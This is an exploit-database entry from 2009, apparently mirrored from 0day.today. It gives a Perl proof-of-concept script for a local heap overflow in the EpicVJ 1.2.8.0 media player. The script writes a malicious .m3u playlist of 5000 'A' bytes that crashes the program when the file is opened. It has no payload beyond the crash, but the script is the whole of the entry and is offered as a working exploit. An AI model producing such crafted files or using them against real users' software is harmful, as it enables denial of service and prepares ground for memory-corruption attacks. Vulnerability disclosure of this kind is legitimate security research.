id: 6927
date: 07/19/2009
title: EpicVJ 1.2.8.0 (.mpl/.m3u) Local Heap Overflow PoC
author: hack4love
cves: 

==================================================
EpicVJ 1.2.8.0 (.mpl/.m3u) Local Heap Overflow PoC
==================================================


#!/usr/bin/perl
# Found By :: HACK4LOVE
# EpicVJ 1.2.8.0 (.mpl / .m3u ) Local heap Overflow PoC
# http://www.epicdjsoftware.com/
########################################################################################
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.m3u');
print myfile $crash;
########################################################################################



#  0day.today [2023-03-23]  #